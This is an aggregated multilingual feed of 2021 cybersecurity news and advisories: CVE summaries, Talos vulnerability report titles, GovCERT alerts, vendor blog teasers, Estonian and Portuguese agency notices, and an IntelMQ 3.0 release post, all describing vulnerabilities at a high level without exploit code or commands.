A path traversal vulnerability exists in Nagios XI below version 5.8.5 AutoDiscovery component and could lead to post authenticated RCE under security context of the user running Nagios. Read more: "Securing Network Management Systems: Nagios XI"

https://claroty.com/team82/disclosure-dashboard/cve-2021-37343
MKM: Valitsus eraldas pool miljonit RIA tehnoloogiavõla vähendamiseks
2021-08-13T06:03:03Z | 1628834583

Valitsus otsustas eile eraldada valitsuse reservist Majandus- ja Kommunikatsiooniministeeriumile 500 000 eurot täiendavateks investeeringuteks riigiportaali eesti.ee vananenud infosüsteemide kiirkorras uuendamiseks ja vajadusel sulgemiseks ning küberintsidentide ennetamiseks.

https://ria.ee/uudised/mkm-valitsus-eraldas-pool-miljonit-ria-tehnoloogiavola-vahendamiseks
CVE-2021-32935
2021-08-12T00:00:00Z | 1628726400

CWE-502 DESERIALIZATION OF UNTRUSTED DATA:The affected product deserializes untrusted data, which could allow a remote attacker access to system level permission commands and local privilege escalation.

https://claroty.com/team82/disclosure-dashboard/cve-2021-32935
High Threat Security Alert (A21-08-06): Multiple Vulnerabilities in Microsoft Products (August 2021)
2021-08-11T04:00:00Z | 1628654400

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A21-08-07): Multiple Vulnerabilities in Firefox
2021-08-11T04:00:00Z | 1628654400

Mozilla has published the advisories (MFSA2021-33 and MFSA2021-34) to address multiple vulnerabilities in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
AT&T Labs Xmill XML parsing CreateLabelOrAttrib memory corruption vulnerability
2021-08-11T00:00:00Z | 1628640000

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1279
CVE-2021-33721
2021-08-11T00:00:00Z | 1628640000

CWE-78 IMPROPER NEUTRALIZATION OF SPECIAL ELEMENTS USED IN AN OS COMMAND ('OS COMMAND INJECTION')Successful exploitation of this vulnerability could allow an authenticated remote attacker with system privileges to execute arbitrary code on the system under certain conditions.

https://claroty.com/team82/disclosure-dashboard/cve-2021-33721
SonicWall Analytics Remote Command Execution via Java Debug Wire Protocol
2021-08-10T14:29:32Z | 1628605772

SonicWall Analytics 2.5 On-Prem is vulnerable to Java Debug Wire Protocol (JDWP) interface security misconfiguration vulnerability which potentially leads to Remote Code Execution. This vulnerability impacts Analytics On-Prem 2.5.2518 and earlier. CVE: CVE-2021-20032 Last updated: Aug. 10, 2021, 2:29 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0018
Lessons I’ve Learned While Scaling Up a Data Warehouse
2021-08-10T06:49:29Z | 1628578169

Building and maintaining a data warehouse is not an easy task, many questions need to be answered to choose which technology you’re going to use. For example: What are your use cases? These may change over time, for instance involving on-demand aggregations, ease of search, and data retention. What type of business-critical questions will you... The post Lessons I’ve Learned While Scaling Up a Data Warehouse appeared first on Cato Networks.

https://www.catonetworks.com/blog/lessons-ive-learned-while-scaling-up-a-data-warehouse/
AT&T Labs Xmill multiple command line parsing vulnerabilities
2021-08-10T00:00:00Z | 1628553600

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1280
Microsoft Azure Sphere Security Monitor SECTION_ABIDepends denial of service vulnerability
2021-08-10T00:00:00Z | 1628553600

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1311
AT&T Labs Xmill XML decompression DecodeTreeBlock multiple heap-based buffer overflow vulnerabilities
2021-08-10T00:00:00Z | 1628553600

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1291
AT&T Labs Xmill XML decompression LabelDict::Load heap-based buffer overflow vulnerability
2021-08-10T00:00:00Z | 1628553600

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1293
AT&T Labs Xmill XML decompression PlainTextUncompressor::UncompressItem heap-based buffer overflow vulnerability
2021-08-10T00:00:00Z | 1628553600

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1290
AT&T Labs Xmill XML decompression EnumerationUncompressor::UncompressItem heap-based buffer overflow vulnerability
2021-08-10T00:00:00Z | 1628553600

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1292
Mozilla Firefox MediaCacheStream::NotifyDataReceived use-after-free vulnerability
2021-08-10T00:00:00Z | 1628553600

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1345
AT&T Labs Xmill XML parsing ParseAttribs memory corruption vulnerability
2021-08-10T00:00:00Z | 1628553600

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1278
Microsoft Azure Sphere Security Monitor SMSyscallWriteBlockToStageImage information disclosure vulnerability
2021-08-10T00:00:00Z | 1628553600

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1310
Security Alert (A21-08-04): Multiple Vulnerabilities in VMware Products
2021-08-06T04:00:00Z | 1628222400

VMware has published a security advisory to address multiple vulnerabilities in VMware products.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A21-08-05): Multiple Vulnerabilities in Pulse Secure Products
2021-08-06T04:00:00Z | 1628222400

Pulse Secure has published a security advisory to address multiple vulnerabilities in Pulse Connect Secure system software.

https://www.govcert.gov.hk/en/alerts_detail.php
Novo site No More Ransom lançado como marco do 5º ano do projeto
2021-08-06T00:00:00Z | 1628208000

A nova página do Crypto Sheriff oferece informações atualizadas sobre ransomware, bem como conselhos sobre como prevenir uma infeção por ransomware, como a inclusão de backups regulares dos dados e a autenticação multifator de redes corporativas e os serviços de protocolo de desktop remoto. O No More Ransom também sugere que o software e os sistemas operacionais sejam mantidos atualizados com os patches de segurança mais recentes, de forma a impedir que os cibercriminosos explorem vulnerabilidades conhecidas que facilitem a realização de ataques de ransomware. Além disso, o projeto recomenda que, em caso de interrupção causada por um ataque de ransomware, as vítimas não paguem pelo resgate. Recorde-se que o projeto em causa foi fundado pela Europol, a Unidade Nacional de Crimes de Alta Tecnologia da polícia da Holanda, o Centro Europeu de Crimes Cibernéticos da Europol, e as empresas de segurança Kaspersky e McAfee. Atualmente, o projeto oferece 121 ferramentas gratuitas capazes de descriptografar 151 famílias de ransomware. Reúne ainda um total de 170 parceiros dos setores público e privado. O novo website encontra-se disponível em 37 idiomas e basta aceder aqui .

https://dyn.cncs.gov.pt/pt/detalhe/art/135574/novo-site-no-more-ransom-lancado-como-marco-do-5-ano-do-projeto
NCSC-NL publishes the Guide to Cyber Security Measures
2021-08-05T11:35:00Z | 1628163300

To increase the digital resilience of companies and organisations, the NCSC-NL has published the newly translated Guide to Cyber Security Measures. This lists eight measures that every organisation should take to prevent cyber-attacks.

https://english.ncsc.nl/latest/news/2021/august/4/ncsc-nl-publishes-the-guide-to-cyber-security-measures
Security Alert (A21-08-03): Multiple Vulnerabilities in Cisco Products
2021-08-05T04:00:00Z | 1628136000

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
HTTP/2 Request Smuggling
2021-08-05T04:00:00Z | 1628136000

HTTP Request Smuggling (also known as an HTTP Desync Attack) has experienced a resurgence in security research recently, thanks in large part to the outstanding work by security researcher James Kettle. His 2019 Blackhat presentation on HTTP Desync attacks exposed vulnerabilities with different implementations of the HTTP Standards, particularly within proxy servers and Content Delivery Networks (CDNs).These implementation differences with regard to how proxy servers interpret the construction of web requests have led to new request smuggling vulnerabilities. (Direct link to information on new vulnerability).

https://www.akamai.com/blog/security/http-2-request-smulggling
hAFL1 ? Our Journey of Fuzzing Hyper-V and Discovering a Critical 0-Day
2021-08-04T13:00:00Z | 1628082000

Within hours from the moment our in-house built fuzzer, hAFL1, started running ? it found a critical, CVSS 9.9 RCE vulnerability in Hyper-V?s virtual driver.

https://www.akamai.com/blog/security/discovering-a-critical-0-day
[Ep.4] Supply chain attacks & Critical infrastructure: CISA’s approach to resiliency
2021-08-04T10:42:14Z | 1628073734

The post [Ep.4] Supply chain attacks & Critical infrastructure: CISA’s approach to resiliency appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-88
Security Alert (A21-08-02): Multiple Vulnerabilities in FortiOS
2021-08-04T04:00:00Z | 1628049600

FortiNet released security advisories to address multiple vulnerabilities in FortiOS software.

https://www.govcert.gov.hk/en/alerts_detail.php
Já se encontra publicado o Decreto-Lei 65/2021 de 30 de julho
2021-08-04T00:00:00Z | 1628035200

Recorde-se que a aprovação do presente Decreto-Lei foi efetivada no passado dia 17 de junho, o que constituiu um importante passo para Cibersegurança em Portugal, pois representa um instrumento essencial para garantir a conformidade no âmbito da regulamentação do Regime Jurídico da Segurança do Ciberespaço, assim como da implementação de um Quadro Nacional de Certificação da Cibersegurança pela Autoridade Nacional de Certificação da Cibersegurança. Com a publicação deste decreto-lei procede-se à regulamentação dos aspetos remetidos para legislação complementar na Lei n.º 46/2018, de 13 de agosto, que aprovou o regime jurídico da segurança do ciberespaço, e que transpôs a Diretiva (UE) 2016/1148, do Parlamento Europeu e do Conselho, de 6 de julho de 2016, relativa a medidas destinadas a garantir um elevado nível comum de segurança das redes e dos sistemas de informação em toda a União – mais conhecida por Diretiva SRI. Neste sentido, o decreto-lei estabelece os requisitos de segurança das redes e sistemas de informação e de notificação de incidentes que devem ser cumpridos pelas entidades identificadas na Diretiva SRI – entidades da Administração Pública, operadores de infraestruturas críticas, operadores de serviços essenciais dos setores da energia, transportes, bancário, infraestruturas do mercado financeiro, saúde, fornecimento e distribuição de água potável e infraestruturas digitais e pelos prestadores de serviços digitais. Além disso, o decreto-lei em causa determina que o Centro Nacional de Cibersegurança é a Autoridade Nacional de Certificação da Cibersegurança, o que serve a nível nacional para a implementação do Regulamento (UE) 2019/881 do Parlamento e do Conselho, de 17 de abril de 2019, referente à certificação de cibersegurança de produtos, serviços e processos de tecnologias de informação, e para o estabelecimento de um Quadro Nacional de Certificação da Cibersegurança. Através deste último é, assim, estabelecido o enquadramento institucional necessário à produção de vários esquemas nacionais de certificação de cibersegurança, sendo que o CNCS já tem vindo a desenvolver algum trabalho nesta área, nomeadamente com a preparação de um esquema relativo à certificação de conformidade com o Quadro Nacional de Referência em Cibersegurança (QNRC). É, por isso, um instrumento jurídico importante para promover o reforço da resiliência contra incidentes de segurança nas redes e nos sistemas de informação, os quais assumem um papel cada vez mais importante e incontornável na vida quotidiana.

https://dyn.cncs.gov.pt/pt/detalhe/art/135573/ja-se-encontra-publicado-o-decreto-lei-652021-de-30-de-julho
Estatísticas 2020
2021-08-03T12:15:00Z | 1627992900

Estatísticas de 2020 e últimos 12 meses: Incidentes Amplificadores Honeypots Spam Servidores DNS Maliciosos

https://cert.br/stats/
The 2021 Strategic Roadmap for SASE Convergence
2021-08-03T05:40:53Z | 1627969253

Understanding the 2021 Strategic Roadmap for SASE Convergence In July 2019, Gartner coined the term Secure Access Service Edge (SASE) to define the next generation of network security technology. SASE solutions acknowledge that modern networks and security challenges are very different from the past. By integrating core security capabilities into a single service and moving... The post The 2021 Strategic Roadmap for SASE Convergence appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-2021-strategic-roadmap-for-sase-convergence/
Security Alert (A21-08-01): Multiple vulnerabilities in Google Chrome
2021-08-03T04:00:00Z | 1627963200

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
VB2021 localhost call for last-minute papers
2021-08-02T10:29:00Z | 1627900140

The call for last-minute papers for VB2021 localhost is now open. Submit before 20 August to have your paper considered for one of the slots reserved for 'hot' research! Read more

https://www.virusbulletin.com/blog/2021/08/vb2021-localhost-call-last-minute-papers/
IntelMQ 3.0 - Configuration, Domain based workflow, IEPs
2021-08-02T09:34:11Z | 1627896851

We are happy to announce the completion of the IntelMQ 3.0 milestone. The addition of 2 developers to the IntelMQ development team in October 2020 allowed us to work on major IntelMQ 3.0 changes - new features as well as architectural changes. The most important new features are: Domain-based workflow (Capability to use domain-based data) Simplified configuration management Easier bot development via "Mixins" The development was based on a thorough collection of user requirements by former CERT.at employee Aaron Kaplan. This requirements collection included personal interviews in the CERT-community, workshops at CERT-conferences as well as architectural reviews. Our previous IntelMQ release, IntelMQ 2.3.0, was an intermediate step, and brought, for example, Docker-support, the IntelMQ-API and the revised documentation page. Domain based workflow The introduction of various new IntelMQ bots (also know as "Experts") removed IntelMQ's previous limitation to IP address-based data. Versions prior to IntelMQ 3.0 supported almost no domain-based workflows, most operations and look-ups could only be performed with IP addresses. For example, if the domain "example.com" was used as a command and control server, IntelMQ had to resolve example.com to an IP address and add that to the event. Any further processing was based on this IP address. To overcome this limitations, we added some new components in IntelMQ 3.0 that address the different requirements for processing domain-based data. These include: Querying the HTTP return status of websites Examining website's content (for example to detect whether a website has been defaced) Taking a screenshot of a web page using LookyLoo Querying contact information for a domain The important "experts" bots for domain-based workflows that where added in IntelMQ 3.0 at a glance: HTTP StatusCode Expert: Checks websites' response status code with a given value HTTP Content Expert: Checks websites' content for a given string LookyLoo Expert: Instructs a LookyLoo-instance to create a screenshot of the given website and adds a screenshot URL RDAP Expert: Checks the given domain against public or user defined RDAP services.[1] uWhoisd: Queries a uWhoisd WHOIS-proxy instance and saves the whois-response. This expert was contributed by Raphaël Vinot (CIRCL). Trusted Introducer Lookup Expert: Checks which CERT is responsible for the domain in the Trusted Introducer directory. Tuency Expert: Queries a tuency Contact database to enrich the event with constituency and notification information (e.g. abuse contact for a domain) based on configured rules. A future blog post will discuss the release of Tuency in greater detail. For additional approaches for looking up abuse contact information, please have a look at our guide on abuse-contact look-ups. IntelMQ Enhancement Proposal (IEP) An IEP is a document, like an RFC or a PEP (Python Enhancement Proposal) that describes the proposed changes in detail, including examples and implications. These texts are available in a separate GitHub repository certtools/ieps, which can also be used to work on them collaboratively. Our idea behind introducing the IntelMQ Enhancement Proposal (IEP) process was to discuss major changes publicly to reach a consensus within the community. The discussion in the community takes place on the developer's mailinglist. This process allows us to collect feedback, insight and proposals from the whole community. It's up to the community to decide if a proposal can be adopted or rejected. We have published 4 IEPs so far and have two more in the pipeline: # Name Status Released in version 001 Configuration Handling Implementation completed 3.0.0 002 Mixins Implementation completed 3.0.0 003 Internal Data Format: Multiple Values Dismissed - 004 Internal Data Format: Meta Information and Data Exchange Undecided/Postponed - 005 Internal Data Format: Notification settings Undiscussed - 006 Internal Data Format: Msgpack as serializer Undiscussed - IEP01: Configuration In IntelMQ 3.0, we redesigned the configuration to simplify the maintenance of an IntelMQ instance. In the proposal IEP 001 we described common issues with the current JSON configuration and asked the community to vote for one out of three possible new data formats. The community decided on YAML, a choice we are very happy with because we believe it offers the best usability. This change also merged three different and overlapping configuration files (defaults.conf, pipeline.conf and runtime.conf) into one single runtime.yaml. Furthermore, it is now possible to store default parameter values inside each bot programmatically, which reduces the risk for errors when new parameters are added. This eliminates the need for the BOTS file, further reducing configuration complexity and development effort. IEP02: Mixins Mixins are a new component in IntelMQ to simplify the creation of new bots, by allowing the developer to use already existing templates to cover common tasks, such as Caches/States and HTTP Sessions. IEP03: Multiple Values in the data format In IntelMQ's Internal Data Format ("IDF"), one field can have only one value, for example a single IP address or domain. However, in practice an IoC (Indicator of Compromse) may consist of multiple fields, e.g. a domain could map to multiple IP addresses. Allowing multiple values - as specified by IEP03 - would address this issue. An alternative approach would be linking events by unique identifiers as specified in IEP04 (see below). IEP03 and IEP04 are mutually exclusive. Data example without Multiple Values { "source.ip": "192.168.0.1", "source.observation": "2021-07-22T11:12:52+00:00Z", "extra.tags": "http-exploit", } Data example with Multiple Values { "source.ip": ["192.168.0.1", "192.168.2.1"], "source.observation": "2021-07-22T11:12:52+00:00", "extra.tags": ["http-exploit", "ddos-amplification"], } IEP04: Meta Information and Data Exchange Meta Information provides context to IoCs and is useful when exchanging data across IntelMQ instances or visualizing event relationships. Based on previous work by the community and our own research, we proposed a possible solution in March 2021. The proposal included a detailed analysis of the problem, use-cases and an implementation suggestion. The community welcomed the proposal, but did not reach a consensus on the exact specification. IEP03 and IEP04 were also the topic of the first - virtual - IntelMQ Hackathon which took place on 22nd April 2021. The discussion of the proposal is still ongoing and a conclusion has not been reached yet. The biggest concern within the community is, that IEP04 would add a lot of complexity and would be considered a breaking change. Example { "__meta": { "UUID": "1ea60f56-b67b-61fc-829a-0242ac130003", "Version": 1, }, events: [ { "source.ip": "192.168.0.1/32", "source.observation": "2021-07-22T11:12:52+00:00", } ] } Various other new bots and improvements An Aggregate Expert is now included in IntelMQ by default, allowing users to aggregate matching events within a configured time span. Aggregation means that single events will be discarded and the count of matching events in the time span is kept. The Threshold expert provides similar functionality, which passes an event when a configured threshold count is reached within the configured time span. This expert is a contribution by Karl Johan Karlsson (liu.se). n6 Integration IntelMQ 3.0 integrates seamlessly with n6, an automated incident handling tool similar to IntelMQ, including bi-directional conversion of data formats. For more information, please see our documentation. Final note A detailed list of all changes can be found in the release notes, the full documentation is available at intelmq.readthedocs.io. As IntelMQ is a community project, every contribution is welcome. If you want to know more about "How to create a bot", please check out our Developer's Guide. [1] RDAP is the successor of WHOIS using JSON as machine-readable data format. This blog post is part of a series of blog posts related to our CEF Telecom 2018-AT-IA-0111 project, which also supports our participation in the CSIRTs Network.

https://www.cert.at/en/blog/2021/8/intelmq-30-domain-based-workflow-ieps
Putting Purpose First as an Akamai Co-Op
2021-08-02T04:00:00Z | 1627876800

As I began my CSR Co-op position this year, I wanted to see up-close how a corporate foundation works. What I've found is that the work the Akamai Foundation does around the world is inspiring! Whether it's partnering with STEM educators, responding to the COVID-19 crisis, planning employee volunteerism efforts, or creating a hardship fund to support our community, what we do here has a positive impact across the globe. And, thanks to this co-op opportunity, I've been able to play a real part in driving this impact forward.

https://www.akamai.com/blog/culture/putting-purpose-first-as-akamai-co-op
Threat hunting: an outdated technique or a tactical advantage?
2021-08-02T00:00:00Z | 1627862400

https://www.first.org/blog/20210802-Threat_hunting_an_outdated_technique_or_a_tactical_advantage
Threat hunting: an outdated technique or a tactical advantage?
2021-08-02T00:00:00Z | 1627862400

https://www.first.org/blog/20210802-Threat_hunting_an_outdated_technique_or_a_tactical_advantage
The Evolution of Remote Access: From VPN to ZTNA to SASE
2021-08-01T07:08:55Z | 1627801735

The post The Evolution of Remote Access: From VPN to ZTNA to SASE appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-86
Akamai's Commitment to Reliability
2021-07-30T04:00:00Z | 1627617600

For more than 20 years, Akamai has worked very hard to earn the trust and confidence of our customers and partners by developing services that can be relied upon to be available and secure at all times.

https://www.akamai.com/blog/news/akamais-commitment-to-reliability
tinyobjloader LoadObj improper array index validation vulnerability
2021-07-30T00:00:00Z | 1627603200

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1212
RIA täiendav selgitus andmevarguse kohta
2021-07-29T14:22:30Z | 1627568550

Inimesed, kelle dokumendifoto oli ebaseaduslikult alla laaditud ei pea uut dokumenti ega fotot tegema. Intsident ei avalda mõju ID-kaardile, mobiil- ja Smart-ID-le ega e-teenustele.

https://ria.ee/uudised/ria-taiendav-selgitus-andmevarguse-kohta
Holiday Readiness, Part One: What you Should be Thinking About Four Months Out?Security
2021-07-29T04:00:00Z | 1627531200

The beginning of August is upon us, and if you haven?t already started thinking about the busiest time of the year, now is a good time to do so. Whether you?re an experienced veteran of managing peak traffic or new to the game, Q4 can bring surprises when it comes to performance and security. And while it?s nearly impossible to prepare for every situation, there are a number of options and solutions available at Akamai to help manage the surge of traffic (both good and bad) that will be hitting the retail industry during the holiday season, especially on Black Friday and Cyber Monday.

https://www.akamai.com/blog/trends/holiday-readiness-what-you-should-be-thinking-about-four-months
Zero Trust Should Not Give IT a Bad Name
2021-07-29T04:00:00Z | 1627531200

Maybe you?ve just found out that your company?s IT organization is implementing Zero Trust. Does that mean they don?t trust you? ?Zero Trust? sure sounds that way. Maybe you?ve read about it online or heard somebody talk about it in terms that equate Zero Trust with the idea that users and devices are never trusted.

https://www.akamai.com/blog/security/zero-trust-should-not-give-it-a-bad-name
Alerta CNCS: Cuidado com os links que recebe via SMS
2021-07-29T00:00:00Z | 1627516800

Está a ocorrer uma campanha maliciosa, utilizando o malware FluBot, que afeta os dispositivos móveis Android. Se receber um SMS referente a uma encomenda perdida ou correio de voz não clique no link, é um esquema que instalará uma aplicação maliciosa no sistema Android com o objetivo de roubar dados bancários. Relembramos que nunca deve instalar aplicações cuja origem não seja conhecida.

https://dyn.cncs.gov.pt/pt/detalhe/art/135572/alerta-cncs-cuidado-com-os-links-que-recebe-via-sms
Critical 9.9 Vulnerability in Hyper-V Allowed Attackers to Exploit Azure
2021-07-28T13:00:00Z | 1627477200

Guardicore Labs, in collaboration with SafeBreach Labs, found a critical vulnerability in Hyper-V?s virtual network switch driver (vmswitch.sys).

https://www.akamai.com/blog/security/critical-vulnerability-in-hyper-v-allowed-attackers-to-exploit-azure
UK and allies publish advice to fix global cyber vulnerabilities
2021-07-28T11:53:50Z | 1627473230

A joint advisory from international allies has offered advice for the most publicly known software vulnerabilities.

https://www.ncsc.gov.uk/news/global-cyber-vulnerabilities-advice
PPA ja RIA peatasid andmete ebaseadusliku allalaadimise
2021-07-28T07:53:16Z | 1627458796

RIA eksperdid peatasid massilise dokumendifotode allalaadimise isikut tõendavate dokumentide andmebaasist. Seda võimaldas turvanõrkus RIA hallatavas, fotosid vahendavas teenuses. Politsei pidas kahtlustatava kinni ning alustas juhtunu asjaolude väljaselgitamiseks kriminaalmenetlust.

https://ria.ee/uudised/ppa-ja-ria-peatasid-andmete-ebaseadusliku-allalaadimise
High Threat Security Alert (A21-07-18): Vulnerability in Microsoft Windows
2021-07-28T04:00:00Z | 1627444800

Microsoft released a security advisory to address a NTLM relay attack named PetitPotam on Windows domain controllers or other Windows servers.

https://www.govcert.gov.hk/en/alerts_detail.php
Software-Defined Networking Concept Adoption at Akamai
2021-07-28T04:00:00Z | 1627444800

Akamai engineering has adopted new technology concepts to enhance and expand routing capabilities at the edge. Previously, Akamai?s traffic-steering capabilities were mainly focused on DNS-based routing. In this article, we would like to give you an in-depth look at how Akamai has embraced new routing technology concepts and merged them into the Akamai edge to enhance routing capabilities, provide faster and better traffic steering, and offer even better performance.

https://www.akamai.com/blog/performance/software-defined-networking-concept-adoption-at-akamai
Horizon for SASE Adoption Shortens, Fewer Sample Vendors Identified in SASE Category of Gartner Hype Cycle for Networking, 2021
2021-07-27T12:42:22Z | 1627389742

Every year, Gartner issues its annual take on the networking industry, and this year is no different. The just-released Hype Cycle for Enterprise Networking, 2021 and Hype Cycle for Network Security, 2021 provide snapshots of which networking and security technologies are on the rise — and which aren’t. And when it comes to secure access... The post Horizon for SASE Adoption Shortens, Fewer Sample Vendors Identified in SASE Category of Gartner Hype Cycle for Networking, 2021 appeared first on Cato Networks.

https://www.catonetworks.com/blog/horizon-for-sase-adoption-shortens-fewer-sample-vendors-identified-in-sase-category-of-gartner-hype-cycle-for-networking-2021/
Work from Anywhere Survey Finds Dramatic Increase in IT Cost
2021-07-27T11:35:04Z | 1627385704

The COVID-19 pandemic only served to accelerate the growing shift to work from anywhere. Due to the forced, but positive, experiment with remote work, many enterprises plan to continue supporting remote work indefinitely. However, the shift to remote work occurred suddenly, catching many enterprises unprepared. In Cato’s recent WFA Survey, 78% of IT professionals were... The post Work from Anywhere Survey Finds Dramatic Increase in IT Cost appeared first on Cato Networks.

https://www.catonetworks.com/blog/work-from-anywhere-survey-finds-dramatic-increase-in-it-cost/
Shrinking a Machine Learning Pipeline for AWS Lambda
2021-07-27T11:00:14Z | 1627383614

Using AWS Lambda for deploying machine learning algorithms is on the rise. You may ask yourself, “What is the benefit of using Lambda over deploying the model to an AWS EC2 server?” The answer: enabling higher throughput of queries. This scale-up may challenge an EC2 server, but not Lambda. It enables up to 2,000 parallel queries.... The post Shrinking a Machine Learning Pipeline for AWS Lambda appeared first on Cato Networks.

https://www.catonetworks.com/blog/shrinking-a-machine-learning-pipeline-for-aws-lambda/
High Threat Security Alert (A21-07-17): Vulnerability in Apple iOS and iPadOS
2021-07-27T04:00:00Z | 1627358400

Apple has released iOS 14.7.1 and iPadOS 14.7.1 to fix the vulnerability in various Apple devices.

https://www.govcert.gov.hk/en/alerts_detail.php
All Access Is (or Should Be) Remote Access
2021-07-27T04:00:00Z | 1627358400

With the transition to remote work, we often hear the term remote access used in unison. Typically, remote work application access is facilitated via a remote access mechanism and, presumably, local work application access is facilitated via a local access mechanism. But I argue that this connection does not really hold true. Sure, remote work does require the use of a remote access mechanism, but the mechanism can and should also be used for local work. There's really no such thing as local access.

https://www.akamai.com/blog/security/all-access-is-or-should-be-remote-access
Cutting the Red Tape: Lessons Learned from CyberThreats 2021
2021-07-27T04:00:00Z | 1627358400

If I had a dollar for every time I heard the phrase ?digital transformation,? I would have a lot of dollars. I?m sure you would too. We?d have even more if we counted the term ?Zero Trust.? (Maybe we should start counting them, now that I think about it!)

https://www.akamai.com/blog/news/cutting-the-red-tape-lessons-learned-from-cyberthreats-2021
Foxit Reader removeField use-after-free vulnerability
2021-07-27T00:00:00Z | 1627344000

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1294
Foxit Reader FileAttachment annotation use-after-free vulnerability redux
2021-07-27T00:00:00Z | 1627344000

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1307
Foxit Reader Field OnFocus event use-after-free vulnerability
2021-07-27T00:00:00Z | 1627344000

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1336
121 ferramentas contra ransomware num único website
2021-07-27T00:00:00Z | 1627344000

Nos seus cinco anos de existência, o projeto No More Ransom, do qual o CNCS é parceiro, ajudou a evitar que quase mil milhões de euros acabassem nos bolsos dos criminosos. Saiba mais aqui.

https://dyn.cncs.gov.pt/pt/detalhe/art/135571/121-ferramentas-contra-ransomware-num-unico-website
Why Zero Trust Needs the Edge
2021-07-26T04:00:00Z | 1627272000

Backhauling traffic destroys performance, and backhauling attack traffic can destroy even more. Nevertheless, in a traditional security deployment model, we are faced with the lose-lose options of either backhauling all traffic to the security stack or allowing some accesses to not go through the security stack. Of course, in the modern world where cyberattacks can cause enormous damage, the latter option is not really an option at all. All traffic must route through a robust security stack. So how do we accomplish this goal without backhauling? The answer is Zero Trust security deployed and delivered as an edge service.

https://www.akamai.com/blog/security/why-zero-trust-needs-the-edge
G2A's Journey to Global Growth, Part 1: Keeping Gamers and Geeks Playing During a Pandemic
2021-07-26T04:00:00Z | 1627272000

Near the end of March 2020, G2A.COM saw its traffic virtually double overnight. The pandemic had just begun, and people were looking for ways to stay entertained and connected under lockdown. Not surprisingly, a lot of people turned to video games, and G2A.COM was one of the first places they went to for affordable game keys and activation codes.

https://www.akamai.com/blog/performance/g2as-journey-to-global-growth-part-1-keeping-gamers-and-geeks
Anyone for Alphabet Soup? ZTNA, SWGs, MFA, and More: Lessons Learned from Fed Day CyberThreats 2021
2021-07-26T04:00:00Z | 1627272000

Last week, we gathered a few of the most prominent leaders and experts from every corner of the federal space to talk about all things cybersecurity and digital transformation. Discussions ranged from the move toward Zero Trust Network Access (ZTNA), and effectively managing identities and access with a secure web gateway (SWG) to keep data safe, to what the executive order on cybersecurity means for agencies -- time to implement a multi-factor authentication (MFA) solution.

https://www.akamai.com/blog/news/anyone-for-alphabet-soup-ztna-swgs-mfa-and-more-lessons-learned
CODESYS Development System Engine.plugin ProfileInformation ProfileData Unsafe Deserialization vulnerability
2021-07-26T00:00:00Z | 1627257600

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1306
CODESYS Development System ComponentModel ComponentManager.StartupCultureSettings Unsafe Deserialization vulnerability
2021-07-26T00:00:00Z | 1627257600

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1301
CODESYS Development System PackageManagement.plugin ExtensionMethods.Clone() Unsafe Deserialization vulnerability
2021-07-26T00:00:00Z | 1627257600

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1302
CODESYS Development System ObjectManager.plugin Project.get_MissingTypes() Unsafe Deserialization vulnerability
2021-07-26T00:00:00Z | 1627257600

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1305
CODESYS Development System ComponentModel Profile.FromFile() Unsafe Deserialization vulnerability
2021-07-26T00:00:00Z | 1627257600

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1300
CODESYS Development System ObjectManager.plugin ProfileInformation.ProfileData Unsafe Deserialization vulnerability
2021-07-26T00:00:00Z | 1627257600

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1303
CODESYS Development System ObjectManager.plugin ObjectStream.ProfileByteArray Unsafe Deserialization vulnerability
2021-07-26T00:00:00Z | 1627257600

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1304
Velociraptor vs. PrintNightmare
2021-07-26T00:00:00Z | 1627257600

Hunting a Zero day!

https://www.first.org/blog/20210726-Velociraptor_vs_PrintNightmare
Velociraptor vs. PrintNightmare
2021-07-26T00:00:00Z | 1627257600

Hunting a Zero day!

https://www.first.org/blog/20210726-Velociraptor_vs_PrintNightmare
Security Alert (A21-07-15): Vulnerability in Drupal
2021-07-23T04:00:00Z | 1627012800

Drupal has released a security advisory to address a vulnerability in the pear Archive_Tar library.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A21-07-16): Multiple Vulnerabilities in Cisco Products
2021-07-23T04:00:00Z | 1627012800

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
Lançado Boletim 3/2021, do Observatório de Cibersegurança
2021-07-23T00:00:00Z | 1626998400

O Boletim 3/2021, do Observatório de Cibersegurança, é dedicado ao tema “competências”, refletindo sobre o mote da conferência C-DAYS 2021, organizada pelo CNCS, "naturalizar competências", e sobre a situação do país relativamente às competências em cibersegurança.Como sempre, o Boletim é também uma oportunidade para partilhar publicações e notícias.Poderá aceder ao documento aqui.

https://dyn.cncs.gov.pt/pt/detalhe/art/135570/lancado-boletim-32021-do-observatorio-de-ciberseguranca
Cyber weather in June: symptoms of a "cyber snuffle" and updated statistics
2021-07-22T10:16:46Z | 1626949006

